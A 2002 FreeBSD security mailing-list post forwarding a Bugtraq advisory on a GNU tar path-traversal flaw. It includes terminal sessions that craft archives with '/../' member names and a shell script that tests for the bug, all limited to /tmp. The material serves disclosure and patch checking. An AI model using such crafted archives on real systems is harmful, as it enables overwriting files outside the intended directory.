Date: Tue, 01 Oct 2002 10:47:23 -0600 From: Brett Glass <brett@lariat.org> To: security@FreeBSD.ORG Subject: Is FreeBSD's tar susceptible to this? Message-ID: <4.3.2.7.2.20021001104558.00d3f900@localhost>
next in thread | raw e-mail | index | archive | help
From Bugtraq: Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq@securityfocus.com> List-Help: <mailto:bugtraq-help@securityfocus.com> List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com> List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com> Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 17532 invoked from network); 26 Sep 2002 23:50:32 -0000 X-Authentication-Warning: datacontact.hu: boldi owned process doing -bs Date: Fri, 27 Sep 2002 02:11:07 +0200 (CEST) From: Bencsath Boldizsar <bencsath.boldizsar@mail2002.ebizlab.hit.bme.hu> X-X-Sender: boldi@datacontact.hu To: bugtraq@securityfocus.com Subject: Allot Netenforcer problems, GNU TAR flaw Message-ID: <Pine.LNX.4.44.0209270208190.21585-100000@datacontact.hu> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=iso-8859-2 Content-Transfer-Encoding: 8BIT X-Virus-Scanned: by amavis-dc X-UIDL: 04e05b0b2a906d53883806bcadcee73b Security Advisory, case study - Netenforcer 1.Multiple security flaws lead to Netenforcer privilege escalation 2.Vulnerable tar packages [Netenforcer material snipped] 2. Description of the "tar" problem Creating a tar file with -P option one can put any file names in the tar file. While unpacking such tar files, tar is designed to remove leading slash. Other security feature of the tar package is to deny deployment of any files whose name contains "dotdot" (".."). A bug in the tar package leads to a security flaw: "../something" is denied by tar "/something" leading slash is removed "/../something" leading slash removed but ".." is NOT denied "./../something" ".." is NOT denied. Although we found this bug by studying tar, we found that this bug has been found by others, we should give them credit: check out: From: Mark J Cox (mjc@redhat.com) Subject: [SECURITY] bug in contains_dot_dot routine Newsgroups: gnu.utils.bug Date: 2002-05-27 03:45:07 PST by Mark J Cox / Red Hat / OpenSSL / Apache Software Foundation and http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1267 While this bug can affect systems with antivirus products (amavis is not affected) or any systems like the before mentioned, we think that a "more rapid" answer to such "small" security problems is needed. As You have seen: Small bugs can lead to a whole system crack. Tar - Affected software versions: GNU tar is affected, but e.g. SunOS tar does not do any sanity check. Debian: tar 1.13.17-2 NOT vulnerable (-) tar 1.13.25-3 (unstable) IS vulnerable (+) tar 1.13.25-2 (unstable) IS vulnerable (+) Suse 7.3 tar 1.13.18 NOT vulnerable Suse 6.4 tar 1.13.17 NOT vulnerable Netenforcer: tar (in software 4.2) IS vulnerable others: unknown Sample session: echo "foo bar" >/tmp/zz/b echo "foo bar" >/tmp/zz/b2 echo "foo bar" >/tmp/zz/b3 echo "foo bar" >a boldi@boldi:/tmp/b$ tar cfv b.tar a ../../../../../../../tmp/zz/b -P a ../../../../../../../tmp/zz/b boldi@boldi:/tmp/b$ rm /tmp/zz/b boldi@boldi:/tmp/b$ tar xfv b.tar a ../../../../../../../tmp/zz/b tar: ../../../../../../../tmp/zz/b: Member name contains `..' tar: Error exit delayed from previous errors boldi@boldi:/tmp/b$ls -la /tmp/zz/b ls: /tmp/zz/b: No such file or directory #note - this is O.K. , if found ".." in the name #session 2: boldi@boldi:/tmp/b$ tar cfv b2.tar a /tmp/zz/b2 -P a /tmp/zz/b2 boldi@boldi:/tmp/b$ rm /tmp/zz/b2 boldi@boldi:/tmp/b$ tar xfv b2.tar a /tmp/zz/b2 tar: Removing leading `/' from member names boldi@boldi:/tmp/b$ ls -la /tmp/zz/b2 ls: /tmp/zz/b2: No such file or directory boldi@boldi:/tmp/b$ ls -la /tmp/b/tmp/zz/b2 -rw-rw-r-- 1 boldi boldi 10 sze 8 12:47 /tmp/b/tmp/zz/b2 boldi@boldi:/tmp/b$ tar cfv b3.tar a /////tmp/zz/b3 -P a /////tmp/zz/b3 boldi@boldi:/tmp/b$ rm /tmp/zz/b3 boldi@boldi:/tmp/b$ tar xfv b3.tar a /////tmp/zz/b3 tar: Removing leading `/////' from member names boldi@boldi:/tmp/b$ ls -la /tmp/zz/b3 ls: /tmp/zz/b3: No such file or directory #session 2 is o.k. #session 3: boldi@boldi:/tmp/b$ echo "try this one. boldi." >/tmp/zz/final boldi@boldi:/tmp/b$ tar cfv bolditry.tar a /../../../../../../tmp/zz/final -Pa /../../../../../../tmp/zz/final boldi@boldi:/tmp/b$ rm /tmp/zz/final boldi@boldi:/tmp/b$ ls -la /tmp/zz/final ls: /tmp/zz/final: No such file or directory boldi@boldi:/tmp/b$ tar xfv bolditry.tar a /../../../../../../tmp/zz/final tar: Removing leading `/' from member names boldi@boldi:/tmp/b$ ls -la /tmp/zz/final -rw-rw-r-- 1 boldi boldi 21 sze 8 13:03 /tmp/zz/final #session 3: vulnerable. ####Attachment: small script testing Your tar too####### TAR=/usr/bin/tar DIR=/tmp #tar problem tester by boldi cd $DIR mkdir foo cd foo echo "boldi" >bar cd $DIR mkdir tartest cd tartest $TAR cfv boldi.tar /../../../../../../../$DIR/foo/bar -P rm $DIR/foo/bar if [ -f $DIR/foo/bar ] ; then echo "something went wrong with the test"; else $TAR xfv boldi.tar 2>&1 if [ -f $DIR/foo/bar ] ; then echo "Your tar is vulnerable"; else echo "Your tar is NOT vulnerable or error occoured"; fi; fi cd $DIR rm foo/bar rmdir foo rm tartest/boldi.tar rmdir tartest ##############end of attachment########################## Boldizsar Bencsath Dept. of Telecommunications Budapest University of Technology and Economics H-1111 Budapest, Magyar tudósok körútja 2. I ép. E.429. email: bencsath.boldizsar@mail2002.ebizlab.hit.bme.hu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?4.3.2.7.2.20021001104558.00d3f900>